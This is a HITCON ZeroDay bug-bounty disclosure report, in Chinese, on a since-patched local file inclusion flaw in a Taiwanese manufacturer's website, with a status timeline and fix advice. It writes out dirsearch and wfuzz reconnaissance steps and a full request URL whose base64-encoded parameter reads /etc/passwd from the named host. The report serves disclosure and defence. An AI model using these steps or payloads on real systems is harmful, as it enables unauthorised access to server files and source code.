[Bounty] 耀億工業股份有限公司 LFI - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2024-01194
  •  發信 Vendor: 耀億工業股份有限公司
  • Title: [Bounty] 耀億工業股份有限公司 LFI
  • Introduction: 可透過自訂義參數任意讀取主機檔案

處理狀態

目前狀態

公開
Last Update : 2024/10/13
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2024/09/29 17:52:30 : 新提交 (由 Whale120 更新此狀態)
  • 2024/09/29 18:35:38 : 新提交 (由 Whale120 更新此狀態)
  • 2024/10/02 20:58:04 : 審核中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2024/10/08 10:10:35 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2024/10/09 10:35:31 : 確認已修補 (由 Whale120 更新此狀態)
  • 2024/10/13 03:00:21 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2024-01194
  • 通報者:WH_ALE (Whale120)
  • 風險:中
  • 類型:本地檔案引入 (Local File Inclusion, LFI)

參考資料

攻擊者可經由該漏洞取得後端系統檔案及網站程式原始碼等敏感資料。

漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability

OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.yaoi.com.tw/
https://www.qshion.com/

敘述

首先,透過工具dirsearch進行一系列路徑猜解找到/webadmin/include/download.php的路徑

dirsearch --url 'https://www.yaoi.com.tw/'
dirsearch --url 'https://www.yaoi.com.tw/webadmin/'
dirsearch --url 'https://www.yaoi.com.tw/webadmin/include'

圖片
再來,利用 wfuzz 工具進行參數爆破,找到dl
圖片

最後,猜測參數為base64編碼後的,造訪 https://www.yaoi.com.tw/webadmin/include/download.php?dl=L2V0Yy9wYXNzd2Q= 即可獲得 /etc/passwd資訊,也可讀取其他伺服器敏感檔案
圖片

修補建議

針對檔案語法的惡意字元進行逃逸,指定讀取根目錄。
而webadmin底下的功能也不應該由未經認證的使用者存取

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;